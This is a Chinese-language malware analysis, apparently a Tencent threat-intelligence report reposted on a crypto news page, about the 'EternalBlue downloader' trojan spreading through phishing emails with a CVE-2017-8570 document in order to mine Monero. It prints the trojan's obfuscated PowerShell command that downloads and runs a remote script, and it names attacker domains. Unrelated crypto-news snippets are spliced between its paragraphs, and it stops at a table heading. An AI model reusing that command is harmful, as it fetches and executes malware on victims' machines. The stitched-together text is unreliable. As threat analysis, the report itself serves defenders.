WEB:“永恒之蓝下载器木马”新增钓鱼邮件传播，利用用户机器挖矿门罗币_WEB3.0币

作者：

时间：1900/1/1 0:00:00

来源：腾讯御见威胁情报中心

编者注：原标题为《“永恒之蓝下载器木马”新增钓鱼邮件传播，附件含CVE-2017-8570漏洞攻击代码》

“永恒之蓝”下载器木马在感染用户机器上运行后，会自动当前用户的邮箱通讯录并发送附件为urgent.doc的文档，该文档附带CVE-2017-8570漏洞攻击代码。

Galaxy Digital将从Celsius处收购自托管平台GK8:金色财经报道，Galaxy Digital赢得了Celsius Network此前收购的自托管平台GK8的拍卖，但并未披露交易条款。Galaxy Digital联席总裁Chris Ferraro表示，购买价格远低于Celsius于2021年11月收购GK8时1.15亿美元的收购价格。[2022/12/3 21:19:07]

如果被攻击用户收到邮件并不慎打开文档，就可能触发漏洞执行Powershell命令下载mail.jsp：

C:/Windows/System32/cmd.exe/cpowershellIE`x(Ne`w-Obj`ectNet.WebC`lient).DownLoadString(http://ap35nf7.jp/mail.jsp?Administrator*OUHH1)

M31 Capital推出1亿美元Web3基金“Web3 Opportunity Fund”:10月4日消息，据M31 Capital Management,LLC官方网站显示，这家专注于加密资产和区块链技术的投资公司已经推出了一支Web3新基金“Web3 Opportunity Fund”，该基金的募资上限为1亿美元，目前已经从一些头部投资方那里获得了5000万美元的投资承诺，未来将重点投资去中心化基础设施，流动性Token等加密项目。

除了这支Web3新基金之外，M31 Capital此前还推出了多个加密基金产品，包括比特币基金、DeFi 基金和风险投资（VC）基金，并开创了“流动性风险基金”的概念。[2022/10/5 18:39:31]

而下载使用的域名ap35nf7.jp实际上并没有注册，但是依然能够解析到地址：t.awcna.com，是因为被感染机器的本地hosts文件被篡改，使得随机生成的域名映射到木马使用的恶意地址，细节请参考御见威胁情报中心此前发布的报告：《“永恒之蓝下载器”木马篡改hosts指向随机域名，再用多个漏洞攻击内网挖矿》。

美国最高银行监管机构：自市场崩盘以来起草美国加密货币法规的紧迫性有所放缓:金色财经报道，美国货币代理主计长Michael Hsu是美国联邦银行监管机构的现任负责人，在纽约的一次银行家聚会上表示，由于当前的加密货币寒冬，美国金融监管机构在起草新的数字资产法规方面的紧迫性有所降低。他认为数字资产市场价格的暴跌为监管机构提供了更多“时间来纠正问题”。这个行业发展非常迅速，有很多强烈的好奇心和问题，然后，Terra 的崩溃在市场上“引发了传染”，在崩溃之后，监管机构对银行业数字资产的兴趣开始降温。为银行与加密货币互动制定更广泛的基本规则的跨机构监管程序仍然活跃，但速度较慢。[2022/9/8 13:15:05]

本次攻击过程中，木马将使用随机生成的字符加“.cn”或”.jp“或”.kr“后缀作为DGA域名，并在hosts文件中指向域名：

t.tr2q.com,t.awcna.com,t.amynx.com

mail.jsp经过高度混淆，多次解密后可以看到其安装多个计划任务下载Powershell脚本执行，并使用了新的计划任务名：

“Bluetea“蓝茶。

“永恒之蓝”下载器木马自出现之后从未停止更新，从最初的PE样本攻击到后来转移为以Powershell无文件攻击方式躲避查杀，并且通过安装多个类型的计划任务进行持久化。在传播方式上，最初通过供应链攻击积累一批感染机器后，又不断利用”永恒之蓝”漏洞，MSSql爆破，$IPC爆破，RDP爆破等方法进行扩散传播，近期又增加了DGA域名攻击和钓鱼邮件攻击，其最终目的只为利用用户机器挖矿门罗币获利。

永恒之蓝下载器木马的历次版本更新参考下表：